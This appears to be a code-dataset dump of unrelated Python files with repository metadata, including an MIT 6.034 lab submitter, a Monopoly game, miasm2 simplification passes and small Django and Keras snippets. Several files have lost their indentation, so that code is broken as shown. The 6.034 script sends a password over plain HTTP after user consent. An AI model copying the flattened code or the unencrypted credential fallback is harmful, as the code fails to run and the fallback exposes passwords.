print("(note that this could theoretically allow a hacker with access")
print("to your local network to find your 6.034 password)")
        answer = input("(Y/n) >>> ")
if len(answer) == 0 or answer[0] in "Yy":
server = xmlrpclib.Server(server_url.replace("https", "http"))
tests = server.get_tests(username, password, lab.__name__)
else:
print("Ok, not running your tests.")
print("Please try again on another computer.")
print("Linux Athena computers are known to support HTTPS,")
print("if you use the version of Python in the 'python' locker.")
sys.exit(0)
ntests = len(tests)
ncorrect = 0
lab = get_lab_module()
target_dir = get_target_upload_filedir()
tarball_data = get_tarball_data(
target_dir, "lab%s.tar.bz2" % lab.LAB_NUMBER)
print("Submitting to the 6.034 Webserver...")
server.submit_code(username, password, lab.__name__,
xmlrpclib.Binary(tarball_data))
print("Done submitting code.")
print("Running test cases...")
for index, testcode in enumerate(tests):
dispindex = index+1
summary = test_summary(dispindex, ntests)
try:
answer = run_test(testcode, get_lab_module())
except Exception:
show_exception(summary, testcode)
continue
correct, expected = server.send_answer(
username, password, lab.__name__, testcode[0], answer)
show_result(summary, testcode, correct, answer, expected, verbosity)
if correct:
ncorrect += 1
response = server.status(username, password, lab.__name__)
print(response)
print("!! Please note that lab0 has no sever-side test cases.")
print("You receive a 5 if you submit on-time.")
if __name__ == '__main__':
test_offline()
|
[
"lenaxiao@uw.edu"
] |
lenaxiao@uw.edu
|
1dd692e32515fcb5842ba4dd942c7dd8e4e5de2c
|
3fcbbc1a2a262ed3b8fc9d7183c81b5f09445a85
|
/build/viso2/viso2_ros/catkin_generated/pkg.installspace.context.pc.py
|
3fd63f6aa6f66b7565c6857a53f863aa9b1bcc6e
|
[] |
no_license
|
karry3775/SimulationWS
|
0861071c7d1b0f0372dc3515983bf8e092b37d07
|
754336d88d40e8e7d9e677bedff37505df7eaf4d
|
refs/heads/master
| 2021-05-24T12:01:15.763154
| 2020-04-16T02:33:22
| 2020-04-16T02:33:22
| 253,547,979
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 426
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "viso2_ros"
PROJECT_SPACE_DIR = "/home/kartik/Documents/gazebo_practice_ws/install"
PROJECT_VERSION = "0.0.1"
|
[
"kartikprakash3775@gmail.com"
] |
kartikprakash3775@gmail.com
|
40ed3a558af52564d435481fd28bd07e931e359a
|
4181c8a6f54a4dd04587a9872962c48919796226
|
/monopoly/game.py
|
9a32135ac69ea9e64c2bbe769f3cdceb6406ac90
|
[
"MIT"
] |
permissive
|
abhishekmodak/monopoly
|
ab075a9ba5103d2c59b205053002f7226dd15b7b
|
cbb341ce2a37ed86e0d77531692df77b8947ff86
|
refs/heads/master
| 2020-07-20T06:54:18.286041
| 2019-09-05T15:25:27
| 2019-09-05T15:25:27
| 206,593,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,826
|
py
|
from cells import *
from player import Player
class Game:
def __init__(self):
self.count_of_players = 3
self.cell_positions = ['E', 'E', 'J', 'H', 'E', 'T', 'J', 'T', 'E', 'E', 'H', 'J', 'T', 'H', 'E',\
'E', 'J', 'H', 'E', 'T', 'J', 'T', 'E', 'E', 'H', 'J', 'T', 'H', 'J',\
'E', 'E', 'J', 'H', 'E', 'T', 'J', 'T', 'E', 'E', 'H', 'J', 'T', 'E', 'H', 'E']
self.dice_output = [4, 4, 4, 6, 7, 8, 5, 11, 10, 12, 2, 3, 5, 6, 7, 8, 5, 11, 10, 12, 2, 3, 5, 6, 7, 8, 5, 11, 10, 12, 2, 3, 5, 6, 7, 8, 5, 11, 10, 12]
self.game()
def create_obj(self):
self.players = []
for i in range(self.count_of_players):
self.players.append(Player())
self.hotels = {}
for num, item in enumerate(self.cell_positions):
if item == "H":
self.hotels.update({num: Hotel(num)})
self.j1 = Jail()
self.t1 = Treasure()
def declare_winners(self):
for player in self.players:
print(player.remaining_amount)
def calc_price(self, player, position):
if position == 'J':
self.j1.deduct_fine(player)
elif position == 'T':
self.t1.give_rewards(player)
elif position == 'H':
            # assumption: check_transaction takes the current player,
            # mirroring deduct_fine and give_rewards above
            self.hotels[player.position].check_transaction(player)
def calc_position(self, player, item):
        player.position += item
player.position = player.position % len(self.cell_positions)
position = self.cell_positions[player.position]
self.calc_price(player, position)
def game(self):
self.create_obj()
for num, item in enumerate(self.dice_output):
self.calc_position(self.players[num%3], item)
self.declare_winners()
game = Game()
|
[
"amodak828@gmail.com"
] |
amodak828@gmail.com
|
6eb5e4b7dcbd788da2b0eda5a5822547df006bf1
|
a969bd5473ae0e7024e9512a7eafbc2b19cebbbf
|
/miasm2/expression/simplifications_common.py
|
13b25ce20fc95402c857f08e4b0d5c716f526779
|
[] |
no_license
|
buptsseGJ/VulSeeker
|
18c83b7008e41f8f4337c94eecdf365b0cc29dd7
|
b71431045339a2e031950d2f8d99bfce30a44e99
|
refs/heads/master
| 2021-06-27T17:44:44.374702
| 2018-12-25T13:21:59
| 2018-12-25T13:21:59
| 135,588,405
| 97
| 33
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22,526
|
py
|
# ----------------------------- #
# Common simplifications passes #
# ----------------------------- #
from miasm2.expression.modint import mod_size2int, mod_size2uint
from miasm2.expression.expression import ExprInt, ExprSlice, ExprMem, ExprCond, ExprOp, ExprCompose
from miasm2.expression.expression_helper import parity, op_propag_cst, merge_sliceto_slice
def simp_cst_propagation(e_s, expr):
"""This passe includes:
- Constant folding
- Common logical identities
- Common binary identities
"""
    # merge associative ops
args = list(expr.args)
op_name = expr.op
# simpl integer manip
# int OP int => int
    # TODO: <<< >>> << >> are architecture dependent
if op_name in op_propag_cst:
while (len(args) >= 2 and
args[-1].is_int() and
args[-2].is_int()):
int2 = args.pop()
int1 = args.pop()
if op_name == '+':
out = int1.arg + int2.arg
elif op_name == '*':
out = int1.arg * int2.arg
elif op_name == '**':
                out = int1.arg ** int2.arg
elif op_name == '^':
out = int1.arg ^ int2.arg
elif op_name == '&':
out = int1.arg & int2.arg
elif op_name == '|':
out = int1.arg | int2.arg
elif op_name == '>>':
if int(int2) > int1.size:
out = 0
else:
out = int1.arg >> int2.arg
elif op_name == '<<':
if int(int2) > int1.size:
out = 0
else:
out = int1.arg << int2.arg
elif op_name == 'a>>':
tmp1 = mod_size2int[int1.arg.size](int1.arg)
tmp2 = mod_size2uint[int2.arg.size](int2.arg)
if tmp2 > int1.size:
is_signed = int(int1) & (1 << (int1.size - 1))
if is_signed:
out = -1
else:
out = 0
else:
out = mod_size2uint[int1.arg.size](tmp1 >> tmp2)
elif op_name == '>>>':
shifter = int2.arg % int2.size
out = (int1.arg >> shifter) | (int1.arg << (int2.size - shifter))
elif op_name == '<<<':
shifter = int2.arg % int2.size
out = (int1.arg << shifter) | (int1.arg >> (int2.size - shifter))
elif op_name == '/':
out = int1.arg / int2.arg
elif op_name == '%':
out = int1.arg % int2.arg
elif op_name == 'idiv':
assert int2.arg.arg
tmp1 = mod_size2int[int1.arg.size](int1.arg)
tmp2 = mod_size2int[int2.arg.size](int2.arg)
out = mod_size2uint[int1.arg.size](tmp1 / tmp2)
elif op_name == 'imod':
assert int2.arg.arg
tmp1 = mod_size2int[int1.arg.size](int1.arg)
tmp2 = mod_size2int[int2.arg.size](int2.arg)
out = mod_size2uint[int1.arg.size](tmp1 % tmp2)
elif op_name == 'umod':
assert int2.arg.arg
tmp1 = mod_size2uint[int1.arg.size](int1.arg)
tmp2 = mod_size2uint[int2.arg.size](int2.arg)
out = mod_size2uint[int1.arg.size](tmp1 % tmp2)
elif op_name == 'udiv':
assert int2.arg.arg
tmp1 = mod_size2uint[int1.arg.size](int1.arg)
tmp2 = mod_size2uint[int2.arg.size](int2.arg)
out = mod_size2uint[int1.arg.size](tmp1 / tmp2)
args.append(ExprInt(out, int1.size))
# cnttrailzeros(int) => int
if op_name == "cnttrailzeros" and args[0].is_int():
i = 0
while args[0].arg & (1 << i) == 0 and i < args[0].size:
i += 1
return ExprInt(i, args[0].size)
# cntleadzeros(int) => int
if op_name == "cntleadzeros" and args[0].is_int():
if args[0].arg == 0:
return ExprInt(args[0].size, args[0].size)
i = args[0].size - 1
while args[0].arg & (1 << i) == 0:
i -= 1
return ExprInt(expr.size - (i + 1), args[0].size)
# -(-(A)) => A
if (op_name == '-' and len(args) == 1 and args[0].is_op('-') and
len(args[0].args) == 1):
return args[0].args[0]
# -(int) => -int
if op_name == '-' and len(args) == 1 and args[0].is_int():
return ExprInt(-int(args[0]), expr.size)
# A op 0 =>A
if op_name in ['+', '|', "^", "<<", ">>", "<<<", ">>>"] and len(args) > 1:
if args[-1].is_int(0):
args.pop()
# A - 0 =>A
if op_name == '-' and len(args) > 1 and args[-1].is_int(0):
        assert len(args) == 2  # Op '-' with more than 2 args: SanityCheckError
return args[0]
# A * 1 =>A
if op_name == "*" and len(args) > 1 and args[-1].is_int(1):
args.pop()
    # for canonical form:
    # A * -1 => - A
if op_name == "*" and len(args) > 1 and args[-1] == args[-1].mask:
args.pop()
args[-1] = - args[-1]
# op A => A
if op_name in ['+', '*', '^', '&', '|', '>>', '<<',
'a>>', '<<<', '>>>', 'idiv', 'imod', 'umod', 'udiv'] and len(args) == 1:
return args[0]
# A-B => A + (-B)
if op_name == '-' and len(args) > 1:
if len(args) > 2:
raise ValueError(
'sanity check fail on expr -: should have one or 2 args ' +
'%r %s' % (expr, expr))
return ExprOp('+', args[0], -args[1])
# A op 0 => 0
if op_name in ['&', "*"] and args[-1].is_int(0):
return ExprInt(0, expr.size)
# - (A + B +...) => -A + -B + -C
if op_name == '-' and len(args) == 1 and args[0].is_op('+'):
args = [-a for a in args[0].args]
return ExprOp('+', *args)
# -(a?int1:int2) => (a?-int1:-int2)
if (op_name == '-' and len(args) == 1 and
args[0].is_cond() and
args[0].src1.is_int() and args[0].src2.is_int()):
int1 = args[0].src1
int2 = args[0].src2
int1 = ExprInt(-int1.arg, int1.size)
int2 = ExprInt(-int2.arg, int2.size)
return ExprCond(args[0].cond, int1, int2)
i = 0
while i < len(args) - 1:
j = i + 1
while j < len(args):
# A ^ A => 0
if op_name == '^' and args[i] == args[j]:
args[i] = ExprInt(0, args[i].size)
del args[j]
continue
# A + (- A) => 0
if op_name == '+' and args[j].is_op("-"):
if len(args[j].args) == 1 and args[i] == args[j].args[0]:
args[i] = ExprInt(0, args[i].size)
del args[j]
continue
# (- A) + A => 0
if op_name == '+' and args[i].is_op("-"):
if len(args[i].args) == 1 and args[j] == args[i].args[0]:
args[i] = ExprInt(0, args[i].size)
del args[j]
continue
# A | A => A
if op_name == '|' and args[i] == args[j]:
del args[j]
continue
# A & A => A
if op_name == '&' and args[i] == args[j]:
del args[j]
continue
j += 1
i += 1
if op_name in ['|', '&', '%', '/', '**'] and len(args) == 1:
return args[0]
# A <<< A.size => A
if (op_name in ['<<<', '>>>'] and
args[1].is_int() and
args[1].arg == args[0].size):
return args[0]
# (A <<< X) <<< Y => A <<< (X+Y) (or <<< >>>) if X + Y does not overflow
if (op_name in ['<<<', '>>>'] and
args[0].is_op() and
args[0].op in ['<<<', '>>>']):
A = args[0].args[0]
X = args[0].args[1]
Y = args[1]
if op_name != args[0].op and e_s(X - Y) == ExprInt(0, X.size):
return args[0].args[0]
elif X.is_int() and Y.is_int():
new_X = int(X) % expr.size
new_Y = int(Y) % expr.size
if op_name == args[0].op:
rot = (new_X + new_Y) % expr.size
op = op_name
else:
rot = new_Y - new_X
op = op_name
if rot < 0:
rot = - rot
op = {">>>": "<<<", "<<<": ">>>"}[op_name]
args = [A, ExprInt(rot, expr.size)]
op_name = op
else:
# Do not consider this case, too tricky (overflow on addition /
# substraction)
pass
# A >> X >> Y => A >> (X+Y) if X + Y does not overflow
# To be sure, only consider the simplification when X.msb and Y.msb are 0
if (op_name in ['<<', '>>'] and
args[0].is_op(op_name)):
X = args[0].args[1]
Y = args[1]
if (e_s(X.msb()) == ExprInt(0, 1) and
e_s(Y.msb()) == ExprInt(0, 1)):
args = [args[0].args[0], X + Y]
    # (A & A.mask) => A
if op_name == "&" and args[-1] == expr.mask:
return ExprOp('&', *args[:-1])
    # (A | A.mask) => A.mask
if op_name == "|" and args[-1] == expr.mask:
return args[-1]
# ! (!X + int) => X - int
# TODO
    # ((A & mask) >> shift) with mask < 2**shift => 0
if op_name == ">>" and args[1].is_int() and args[0].is_op("&"):
if (args[0].args[1].is_int() and
2 ** args[1].arg > args[0].args[1].arg):
return ExprInt(0, args[0].size)
# parity(int) => int
if op_name == 'parity' and args[0].is_int():
return ExprInt(parity(int(args[0])), 1)
# (-a) * b * (-c) * (-d) => (-a) * b * c * d
if op_name == "*" and len(args) > 1:
new_args = []
counter = 0
for arg in args:
if arg.is_op('-') and len(arg.args) == 1:
new_args.append(arg.args[0])
counter += 1
else:
new_args.append(arg)
if counter % 2:
return -ExprOp(op_name, *new_args)
args = new_args
# A << int with A ExprCompose => move index
if (op_name == "<<" and args[0].is_compose() and
args[1].is_int() and int(args[1]) != 0):
final_size = args[0].size
shift = int(args[1])
new_args = []
# shift indexes
for index, arg in args[0].iter_args():
new_args.append((arg, index+shift, index+shift+arg.size))
# filter out expression
filter_args = []
min_index = final_size
for tmp, start, stop in new_args:
if start >= final_size:
continue
if stop > final_size:
tmp = tmp[:tmp.size - (stop - final_size)]
stop = final_size
filter_args.append(tmp)
min_index = min(start, min_index)
# create entry 0
assert min_index != 0
tmp = ExprInt(0, min_index)
args = [tmp] + filter_args
return ExprCompose(*args)
# A >> int with A ExprCompose => move index
if op_name == ">>" and args[0].is_compose() and args[1].is_int():
final_size = args[0].size
shift = int(args[1])
new_args = []
# shift indexes
for index, arg in args[0].iter_args():
new_args.append((arg, index-shift, index+arg.size-shift))
# filter out expression
filter_args = []
max_index = 0
for tmp, start, stop in new_args:
if stop <= 0:
continue
if start < 0:
tmp = tmp[-start:]
start = 0
filter_args.append(tmp)
max_index = max(stop, max_index)
# create entry 0
tmp = ExprInt(0, final_size - max_index)
args = filter_args + [tmp]
return ExprCompose(*args)
# Compose(a) OP Compose(b) with a/b same bounds => Compose(a OP b)
if op_name in ['|', '&', '^'] and all([arg.is_compose() for arg in args]):
bounds = set()
for arg in args:
bound = tuple([tmp.size for tmp in arg.args])
bounds.add(bound)
if len(bounds) == 1:
bound = list(bounds)[0]
new_args = [[tmp] for tmp in args[0].args]
for sub_arg in args[1:]:
for i, tmp in enumerate(sub_arg.args):
new_args[i].append(tmp)
args = []
for i, arg in enumerate(new_args):
args.append(ExprOp(op_name, *arg))
return ExprCompose(*args)
return ExprOp(op_name, *args)
def simp_cond_op_int(e_s, expr):
"Extract conditions from operations"
# x?a:b + x?c:d + e => x?(a+c+e:b+d+e)
    if expr.op not in ["+", "|", "^", "&", "*", '<<', '>>', 'a>>']:
return expr
if len(expr.args) < 2:
return expr
conds = set()
for arg in expr.args:
if arg.is_cond():
conds.add(arg)
if len(conds) != 1:
return expr
cond = list(conds).pop()
args1, args2 = [], []
for arg in expr.args:
if arg.is_cond():
args1.append(arg.src1)
args2.append(arg.src2)
else:
args1.append(arg)
args2.append(arg)
return ExprCond(cond.cond,
ExprOp(expr.op, *args1),
ExprOp(expr.op, *args2))
def simp_cond_factor(e_s, expr):
"Merge similar conditions"
    if expr.op not in ["+", "|", "^", "&", "*", '<<', '>>', 'a>>']:
return expr
if len(expr.args) < 2:
return expr
if expr.op in ['>>', '<<', 'a>>']:
assert len(expr.args) == 2
# Note: the following code is correct for non-commutative operation only if
# there is 2 arguments. Otherwise, the order is not conserved
# Regroup sub-expression by similar conditions
conds = {}
not_conds = []
multi_cond = False
for arg in expr.args:
if not arg.is_cond():
not_conds.append(arg)
continue
cond = arg.cond
        if cond not in conds:
conds[cond] = []
else:
multi_cond = True
conds[cond].append(arg)
if not multi_cond:
return expr
# Rebuild the new expression
c_out = not_conds
for cond, vals in conds.items():
new_src1 = [x.src1 for x in vals]
new_src2 = [x.src2 for x in vals]
src1 = e_s.expr_simp_wrapper(ExprOp(expr.op, *new_src1))
src2 = e_s.expr_simp_wrapper(ExprOp(expr.op, *new_src2))
c_out.append(ExprCond(cond, src1, src2))
if len(c_out) == 1:
new_e = c_out[0]
else:
new_e = ExprOp(expr.op, *c_out)
return new_e
def simp_slice(e_s, expr):
"Slice optimization"
# slice(A, 0, a.size) => A
if expr.start == 0 and expr.stop == expr.arg.size:
return expr.arg
# Slice(int) => int
if expr.arg.is_int():
total_bit = expr.stop - expr.start
mask = (1 << (expr.stop - expr.start)) - 1
return ExprInt(int((expr.arg.arg >> expr.start) & mask), total_bit)
# Slice(Slice(A, x), y) => Slice(A, z)
if expr.arg.is_slice():
if expr.stop - expr.start > expr.arg.stop - expr.arg.start:
raise ValueError('slice in slice: getting more val', str(expr))
return ExprSlice(expr.arg.arg, expr.start + expr.arg.start,
expr.start + expr.arg.start + (expr.stop - expr.start))
if expr.arg.is_compose():
# Slice(Compose(A), x) => Slice(A, y)
for index, arg in expr.arg.iter_args():
if index <= expr.start and index+arg.size >= expr.stop:
return arg[expr.start - index:expr.stop - index]
# Slice(Compose(A, B, C), x) => Compose(A, B, C) with truncated A/B/C
out = []
for index, arg in expr.arg.iter_args():
# arg is before slice start
if expr.start >= index + arg.size:
continue
# arg is after slice stop
elif expr.stop <= index:
continue
# arg is fully included in slice
elif expr.start <= index and index + arg.size <= expr.stop:
out.append(arg)
continue
# arg is truncated at start
if expr.start > index:
slice_start = expr.start - index
else:
# arg is not truncated at start
slice_start = 0
# a is truncated at stop
if expr.stop < index + arg.size:
slice_stop = arg.size + expr.stop - (index + arg.size) - slice_start
else:
slice_stop = arg.size
out.append(arg[slice_start:slice_stop])
return ExprCompose(*out)
# ExprMem(x, size)[:A] => ExprMem(x, a)
# XXXX todo hum, is it safe?
if (expr.arg.is_mem() and
expr.start == 0 and
expr.arg.size > expr.stop and expr.stop % 8 == 0):
return ExprMem(expr.arg.arg, size=expr.stop)
# distributivity of slice and &
# (a & int)[x:y] => 0 if int[x:y] == 0
if expr.arg.is_op("&") and expr.arg.args[-1].is_int():
tmp = e_s.expr_simp_wrapper(expr.arg.args[-1][expr.start:expr.stop])
if tmp.is_int(0):
return tmp
# distributivity of slice and exprcond
# (a?int1:int2)[x:y] => (a?int1[x:y]:int2[x:y])
if expr.arg.is_cond() and expr.arg.src1.is_int() and expr.arg.src2.is_int():
src1 = expr.arg.src1[expr.start:expr.stop]
src2 = expr.arg.src2[expr.start:expr.stop]
return ExprCond(expr.arg.cond, src1, src2)
# (a * int)[0:y] => (a[0:y] * int[0:y])
if expr.start == 0 and expr.arg.is_op("*") and expr.arg.args[-1].is_int():
args = [e_s.expr_simp_wrapper(a[expr.start:expr.stop]) for a in expr.arg.args]
return ExprOp(expr.arg.op, *args)
# (a >> int)[x:y] => a[x+int:y+int] with int+y <= a.size
# (a << int)[x:y] => a[x-int:y-int] with x-int >= 0
if (expr.arg.is_op() and expr.arg.op in [">>", "<<"] and
expr.arg.args[1].is_int()):
arg, shift = expr.arg.args
shift = int(shift)
if expr.arg.op == ">>":
if shift + expr.stop <= arg.size:
return arg[expr.start + shift:expr.stop + shift]
elif expr.arg.op == "<<":
if expr.start - shift >= 0:
return arg[expr.start - shift:expr.stop - shift]
else:
raise ValueError('Bad case')
return expr
def simp_compose(e_s, expr):
"Commons simplification on ExprCompose"
args = merge_sliceto_slice(expr)
out = []
# compose of compose
for arg in args:
if arg.is_compose():
out += arg.args
else:
out.append(arg)
args = out
# Compose(a) with a.size = compose.size => a
if len(args) == 1 and args[0].size == expr.size:
return args[0]
# {(X[z:], 0, X.size-z), (0, X.size-z, X.size)} => (X >> z)
if len(args) == 2 and args[1].is_int(0):
if (args[0].is_slice() and
args[0].stop == args[0].arg.size and
args[0].size + args[1].size == args[0].arg.size):
new_expr = args[0].arg >> ExprInt(args[0].start, args[0].arg.size)
return new_expr
# {@X[base + i] 0 X, @Y[base + i + X] X (X + Y)} => @(X+Y)[base + i]
for i, arg in enumerate(args[:-1]):
nxt = args[i + 1]
if arg.is_mem() and nxt.is_mem():
gap = e_s(nxt.arg - arg.arg)
if gap.is_int() and arg.size % 8 == 0 and int(gap) == arg.size / 8:
args = args[:i] + [ExprMem(arg.arg,
arg.size + nxt.size)] + args[i + 2:]
return ExprCompose(*args)
# {a, x?b:d, x?c:e, f} => x?{a, b, c, f}:{a, d, e, f}
conds = set(arg.cond for arg in expr.args if arg.is_cond())
if len(conds) == 1:
cond = list(conds)[0]
args1, args2 = [], []
for arg in expr.args:
if arg.is_cond():
args1.append(arg.src1)
args2.append(arg.src2)
else:
args1.append(arg)
args2.append(arg)
arg1 = e_s(ExprCompose(*args1))
arg2 = e_s(ExprCompose(*args2))
return ExprCond(cond, arg1, arg2)
return ExprCompose(*args)
def simp_cond(e_s, expr):
"Common simplifications on ExprCond"
    # eval exprcond src1/src2 with satisfiable/unsatisfiable condition
# propagation
if (not expr.cond.is_int()) and expr.cond.size == 1:
src1 = expr.src1.replace_expr({expr.cond: ExprInt(1, 1)})
src2 = expr.src2.replace_expr({expr.cond: ExprInt(0, 1)})
if src1 != expr.src1 or src2 != expr.src2:
return ExprCond(expr.cond, src1, src2)
# -A ? B:C => A ? B:C
if expr.cond.is_op('-') and len(expr.cond.args) == 1:
expr = ExprCond(expr.cond.args[0], expr.src1, expr.src2)
# a?x:x
elif expr.src1 == expr.src2:
expr = expr.src1
# int ? A:B => A or B
elif expr.cond.is_int():
if expr.cond.arg == 0:
expr = expr.src2
else:
expr = expr.src1
# a?(a?b:c):x => a?b:x
elif expr.src1.is_cond() and expr.cond == expr.src1.cond:
expr = ExprCond(expr.cond, expr.src1.src1, expr.src2)
# a?x:(a?b:c) => a?x:c
elif expr.src2.is_cond() and expr.cond == expr.src2.cond:
expr = ExprCond(expr.cond, expr.src1, expr.src2.src2)
# a|int ? b:c => b with int != 0
elif (expr.cond.is_op('|') and
expr.cond.args[1].is_int() and
expr.cond.args[1].arg != 0):
return expr.src1
    # (C?int1:int2)?A:B => A, B, or a re-ordered ExprCond, depending on int1/int2
elif (expr.cond.is_cond() and
expr.cond.src1.is_int() and
expr.cond.src2.is_int()):
int1 = expr.cond.src1.arg.arg
int2 = expr.cond.src2.arg.arg
if int1 and int2:
expr = expr.src1
elif int1 == 0 and int2 == 0:
expr = expr.src2
elif int1 == 0 and int2:
expr = ExprCond(expr.cond.cond, expr.src2, expr.src1)
elif int1 and int2 == 0:
expr = ExprCond(expr.cond.cond, expr.src1, expr.src2)
return expr
def simp_mem(e_s, expr):
"Common simplifications on ExprMem"
# @32[x?a:b] => x?@32[a]:@32[b]
if expr.arg.is_cond():
cond = expr.arg
ret = ExprCond(cond.cond,
ExprMem(cond.src1, expr.size),
ExprMem(cond.src2, expr.size))
return ret
return expr
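# --- Minimal usage sketch (assumption: miasm2 is installed and the upstream
# expr_simp engine registers the passes defined in this module) ---
if __name__ == '__main__':
    from miasm2.expression.expression import ExprId
    from miasm2.expression.simplifications import expr_simp
    a = ExprId('a', 32)
    assert expr_simp(a ^ a) == ExprInt(0, 32)  # A ^ A => 0
    assert expr_simp(ExprInt(3, 32) + ExprInt(4, 32)) == ExprInt(7, 32)  # constant folding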
|
[
"yangx16@mails.tsinghua.edu.cn"
] |
yangx16@mails.tsinghua.edu.cn
|
fabf8eca0d73238ad7b2b58e3b2ce7e1653c512b
|
1b8b4cdd251877868c1d3530fab7e84a692c91be
|
/learn-python-hard-way/ex30.py
|
9db64f4ab63ef2e0be95c6291680194b23a7ebc3
|
[] |
no_license
|
vaibhavmule/learning-python
|
d1756f4e160bd24e4a2d1d05e383866f2248d523
|
46ec3a437606526760d56ccfefaad74f7184c9ab
|
refs/heads/master
| 2021-09-28T19:42:47.545788
| 2020-07-24T14:07:06
| 2020-07-24T14:07:06
| 20,795,878
| 0
| 2
| null | 2021-09-22T19:33:09
| 2014-06-13T07:29:00
|
HTML
|
UTF-8
|
Python
| false
| false
| 865
|
py
|
# this is exercise 30: Else and If
people = 30 # a variables storing how many people
cars = 40 # a variable storing how many cars
buses = 15 # a variable storing how many buses
# checking if cars are greater than people
if cars > people:
print "We should take the cars"
# checking else if cars are less than people
elif cars < people:
print "We should not take the cars"
# checking what else we can do
else:
print "We can't decide."
# check if buses are greater than cars
if buses > cars:
print "That's too many buses."
# check else if buses are less than cars
elif buses < cars:
print "Maybe we could take the buses"
# check what else we can do
else:
print "We still can't decide."
# check if people are greater than buses
if people > buses:
print "Alright, lets just take the buses."
# what else we can do
else:
print "Fine, let's stay home then."
|
[
"vaibhavmule135@gmail.com"
] |
vaibhavmule135@gmail.com
|
66aacd00e7bdce2111722d081c2878c8166da8bd
|
a16feb303b7599afac19a89945fc2a9603ae2477
|
/Simple_Python/standard/warnings/warning_7.py
|
4d1c278ced1e85f70f1fecb7598ecdf883061180
|
[] |
no_license
|
yafeile/Simple_Study
|
d75874745ce388b3d0f9acfa9ebc5606a5745d78
|
c3c554f14b378b487c632e11f22e5e3118be940c
|
refs/heads/master
| 2021-01-10T22:08:34.636123
| 2015-06-10T11:58:59
| 2015-06-10T11:58:59
| 24,746,770
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 205
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import warnings
def function_with_warning():
warnings.warn('This is a warning!')
function_with_warning()
function_with_warning()
function_with_warning()
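# Note: with the default warning filters this prints the message only once,
# because the "default" action de-duplicates warnings per call site and all
# three calls warn from the same line. Add warnings.simplefilter('always')
# at the top to see all three occurrences.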
|
[
"zhuzhulang@126.com"
] |
zhuzhulang@126.com
|
142605103bd51c65d180b03c9c2e997fb0ecb502
|
3199331cede4a22b782f945c6a71150a10c61afc
|
/20210516PythonAdvanced/02-metaclass/hook02/library.py
|
9f65187d305857184f27f2201567db7d17e230f6
|
[] |
no_license
|
AuroraBoreas/language-review
|
6957a3cde2ef1b6b996716addaee077e70351de8
|
2cb0c491db7d179c283dba205b4d124a8b9a52a3
|
refs/heads/main
| 2023-08-19T23:14:24.981111
| 2021-10-11T12:01:47
| 2021-10-11T12:01:47
| 343,345,371
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
"#Python is a protocol orientated lang; every top-level function or sytax has a corresponding dunder method implemented;"
class BaseMeta(type):
def __new__(cls, name, bases, body):
print('__new__ : ', cls, name, bases, body)
if bases:
if Base in bases:
assert 'bar' in body, f'bar() not found in {name}'
return super().__new__(cls, name, bases, body)
class Base(metaclass=BaseMeta):
def foo(self):
return self.bar()
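# Quick sketch of the hook in action (assumption: run as a script). BaseMeta
# checks at class-creation time that every direct subclass of Base provides
# the bar() that Base.foo() depends on:
class Derived(Base):
    def bar(self):
        return 'bar from Derived'
print(Derived().foo())  # -> 'bar from Derived'
# class Broken(Base): pass  # would raise AssertionError: bar() not found in Broken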
|
[
"noreply@github.com"
] |
AuroraBoreas.noreply@github.com
|
6955d4a7a1fe1a97208eb2b8ebdbcfb9fcee631c
|
dc0981eaa83f9873f9967fe102b6f49e04e7e4a9
|
/website/api/views.py
|
77a8bec609a646c8c38d34fa6557a8c7db6e7431
|
[] |
no_license
|
basheer-97/DjangoBlog
|
f49018b25a291847e7b9a18347b79c3d04ebcd84
|
61279c8bc7d9db6fc9896690c353e127d1e6f929
|
refs/heads/master
| 2021-03-14T06:05:58.278753
| 2020-10-07T06:34:52
| 2020-10-07T06:34:52
| 246,744,000
| 3
| 3
| null | 2020-10-07T06:34:54
| 2020-03-12T04:32:56
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 434
|
py
|
from django.shortcuts import render
from rest_framework import generics, permissions
from website1.models import Post
from . serializers import PostSerializer
# Create your views here.
class PostAPIView(generics.RetrieveUpdateDestroyAPIView):
    queryset = Post.objects.all()
    serializer_class = PostSerializer
class PostAPIDetailView(generics.ListCreateAPIView):
    queryset = Post.objects.all()
    serializer_class = PostSerializer
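# Hypothetical URL wiring for these views (not part of this snapshot):
# from django.urls import path
# urlpatterns = [
#     path('posts/', PostAPIDetailView.as_view()),       # list / create
#     path('posts/<int:pk>/', PostAPIView.as_view()),    # retrieve / update / destroy
# ]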
|
[
"basheerbilal66@gmail.com"
] |
basheerbilal66@gmail.com
|
9afc6dd796a3185ae335688d95be5c99502abd65
|
fa1b7d67de2499d8a90b04f8f84d6189568d6fc3
|
/models/load_model.py
|
bc6bf6f3ab48480920d973b9e6e2172c5c13d0cb
|
[
"Apache-2.0"
] |
permissive
|
SGT103/med_segmentation
|
50502b9e291691b1a3bc8aa5154099cf423396a6
|
ca32024224a3a3f8496bc88aeb756b1475e87b48
|
refs/heads/master
| 2023-08-27T17:09:51.698223
| 2021-07-14T08:55:08
| 2021-07-14T08:55:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,515
|
py
|
from models import Premodel_Custom_Class
from models.Premodel_Custom_Class import *
from models.ModelSet import *
from models.Premodel_Set import *
from tensorflow.keras.models import load_model
import tensorflow as tf
def load_model_file(config, dataset, compile=False):
if config['load_weights_only'] == True:
if 'premodel' in config['model']:
# Load the model weights, the model is defined in Premodel_Set.py
call_model = getattr(Premodel_Set, config['model'])
model, _ = call_model(self=Premodel_Set, config=config)
print('Now dealing dataset ', dataset, 'from the model ', config['model'], '...')
print(config['saved_premodels_path'])
model.load_weights(config['saved_premodels_path'])
else:
# Load the model weights, the model is defined in ModelSet.py
call_model = getattr(ModelSet, config['model'])
model, _ = call_model(self=ModelSet, config=config)
print('Now dealing dataset ', dataset, 'from the model ', config['model'], '...')
